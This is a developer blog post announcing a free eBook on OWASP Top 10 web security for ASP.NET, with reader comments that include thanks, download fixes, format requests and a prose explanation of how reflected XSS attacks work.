Software architect and Microsoft MVP, you’ll usually find me writing about security concepts and process improvement in software delivery.
Writing this series was an epic adventure in all senses of the word:
Duration – 19 months to complete a blog series, for crying out loud!
Content – approaching 50,000 words, not including all the discussion in comments.
Effort – some of the posts, such as transport layer security, probably approached 100 hours of reading, trialling, experimenting and finally, writing and proofing. This is why there was a four month “hiatus” before that post!
But most of all, it was an epic learning adventure for me. Writing the series forced me to know this content in depth, not just the depth that facilitates casual conversation and allows me to send people off to figure out how to fix their flaws, but the depth to really get to grips with these risks, ensure I could exploit them and then make sure I could fix them again.
For example, I knew – and many of us know – that unsalted hashes are vulnerable to a rainbow attack but I’d never actually executed one of these attacks myself. So I did. Same again on sniffing packets; knowing that lack of transport protection leaves network traffic vulnerable is one thing, sitting in the car outside McDonald’s and actually capturing wifi traffic and hijacking the session (my own, that is!) is another thing altogether.
Looking back on it, I’m really happy with what I’ve produced. It’s been a great experience for me and by all accounts, it’s been very well received by the .NET and OWASP communities as well. It turns out I might have actually produced something pretty useful!
So I decided to turn it into an eBook. Oh – and give it away for free. No strings attached. So here it is, 255 pages of .NET web development security goodness. Please share it generously, chuck it on your eBook reader, email it to your mates, quote me, force your developers to print and read every page – whatever – it’s all yours:
If you find it useful, leave me a comment, flick me an email or fire me through a tweet as the feedback really is appreciated. Happy reading and happy holidays everyone.
64 comments:
Just when I thought it couldn't get any better! :-)
Thanks a lot!
This is an excellent resource, thanks for making it available!
Thank you for sharing this excellent and invaluable series on .NET security.
Very nice. Thanks!
Thank you very much. This is a timely book for me
What is OWASP?
"The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software". Check them out at owasp.org
Thank you troy for writing and sharing this excellent series
Too much traffic...
Dropbox says:
"Error (509)
This account's public links are generating too much traffic and have been temporarily disabled!"
Do you have an alternate download location?
Thanks!
ASAFAWeb gives error trying to download. Your app is sooo secure that don't allow downloads?
dropbox has disabled your account you might want to try alternate mirrors
All fixed - thanks for the heads up!
Re-hosted elsewhere and now working fine.
*Fraction* too fast Eddy - try it again now.
Wow!
Due to changes in the Australian VET Training Package for IT I was going to have to re-write my 'web hacking' subject in the Web Development Diploma. I think that this will provide me with the *perfect* text book for that new subject.
Thank you so much!
.h
p.s. as a 'plug' - Hornsby TAFE, infotech.hornsby.tafensw.edu.au :)
thanks a lot for your great work!
All good now Peter, I've moved it somewhere friendlier. Refresh and retry.
Thank you!
Very nice - Thank you!
Great work, thanks!
thank you very much, i'm preparing to be a pen tester, it's really awesome work!
Awesome work mate,
although being the snob that i am, is PDF really considered an eBook? ;-)
Thank you ~~ Very Much^^)
I actually saved this series in my Delicious in the past. Thanks for your free ebook, but could you provide us a mobi/epub version so we can read it on ereader such as Kindle?
Hi Tien, I've had a couple of requests for this so I guess I'd better do it! I'll have an opportunity to test a true eBook reader version over the coming weeks so check back soon.
This is a fantastic read and very thorough. Thanks for freely sharing!
Awesome. Great examples and the content is straight the point
You are awesome. Thnx :)
Thank you!
Thank you so much!
Thank you very much. This looks really good.
Thanks Troy for the book,
The first example for xss attack, makes no sense to me. If you are changing a url parameter in your browser. What it has to do it me. Its not being changed permanently. Why should I be worried.
Thanks Troy for the book,
The first example for xss attack, makes
no sense to me. If you are changing a url parameter in your browser.
What it has to do it me. Its not being changed permanently. Why should I
be worried.
Very impressive! Thanks for sharing.
Jumped in your blog some months ago. I bookmarked your series for later read. Now it comes with a free ebook. So great! Wow so great again :)
Hi Patrick, this is what's referred to as a reflected XSS attack where parameters in the URL are used for malicious purposes. The attack vector here is not you changing the parameters in your own browser, rather it's someone else constructing the URL then having you open it with the expectation that it's legitimate.
For example, if I sent you a link to a trusted website with a legitimate domain and that website asked you to authenticate before accessing the content, if it had an XSS vulnerability I could potentially include arbitrary JavaScript which changed the URL of the form action to my own site thus presenting the opportunity for me to harvest your credentials. Alternatively, the XSS payload may just include script to send me any of your (non-HTTP only) cookies from the site which could include the authentication cookie thus allowing me to hijack your session.
So basically all I need is a vulnerable site and a means of getting you to follow a link to that site. I could attempt to socially engineer you into following it, distribute it via Twitter, shorten it with a URL shortener or even just automatically redirect you from another site. So long as you end up hitting the URL, the attack has succeeded.
Thank you for christmas goodies !!
Its really an asset to have material like this. I myself worked on .NET specific security loop holes identification projects, but this is really an amazing stuff.
hehehe Troy that was quick last week i suggested you to write a book and you gave me suggestion of Beginning Asp.Net Security. now you have written your. i still think you should write a full blown up book which should cater medium to expert developers.
thanks
Kamran
Brilliant series of articles Troy - I can see lots of things we can take
from them to improve the security of our web applications.
I've also forwarded links to your blog to my developer colleagues!
Steve
Appreciate your great job, thank you so much.
Typo:
Page 77 - "a simple Google search can turn op all sorts of things"
It should up "up", not "op".
BTW, thank you, thank you, thank you!
Thanks Troy, After reading your book, I have started looking at the new work I am doing, and makeing it more secure. thanks a lot. I have few things, which I want to discuss with you and they are related to the security issues. Dont know if this is the right place or not.
regards
Parminder
Ah, thank you very much for that, I've just fixed that one and a couple of others and pushed out doc version 1.0.2.
Just drop me an email if you like Parminder:
troyhunt@hotmail.com
Hi Troy, loving the eBook, still reading...
And a request for the next chapter: ASP.NET MVC 3 (or 4)I'd love to read a follow up comparing WebForms with MVC, as with MVC we are generating more content manually. Is the standard MVC HtmlEncoding better than Server.HtmlEncode / HttpUtility.HtmlEncode or should we still resort to the Anti-XSS library?
I guess this answers my question, but would love to see it explained in a new 'chapter' http://haacked.com/archive/2010/04/06/using-antixss-as-the-default-encoder-for-asp-net.aspx
And perhaps discuss the (limitations of) features of ASP.NET 4 like http://www.asp.net/whitepapers/aspnet4#0.2__Toc253429245 and http://www.asp.net/whitepapers/aspnet4#0.2__Toc253429247
And its future features like
http://www.asp.net/vnext/overview/whitepapers/whats-new#_Toc303354465 to http://www.asp.net/vnext/overview/whitepapers/whats-new#_Toc303354468
Great book, thanks.
Is it possible to create it in ePub/mobi format?
Hi Marcin, a few people have asked for that so it's something I'll work on. Stay tuned.
An excellent resource - the only thing that would make it better for me would be for a mobi version so I can push it to my kindle.
Any luck on the epub format?
In progress, just been a little snowed under lately.
Well, that is probably why you need the book... :-)
Was there any update on being an epub version of this book being available as well, or is it just the PDF?
Not yet Steven, but stay tuned.
Cool thanks. Looking forward to having it for easier reference.
Really amazing book!!!
it 's difficut for me to keep in mind all the terminology how can i be convinient to .net and which book i refer........................plz tell me
Sound like you're just starting to learn .NET in which case this book might be a bit premature. Try reading the resources at www.asp.net or if you want a physical book, something like Beginning ASP.NET 4.
Hey Troy Hunt, i appreciate your work. Nice to see that guys like you are providing such resources for free. I'm going to announce this post on my blog (itorian.com), so that maximum techies can reach here. Allow me to do this?
Cheers!!
Abhimanyu Kumar Vatsa
Of course, please share generously!
Well deserved MVP status!
thank you...I'm definitely having a look at your book, I'm very interested to OWASP for ASP.Net
Great job Troy! Your time and effor are very much appreciated. Keep up the good work!
Post a Comment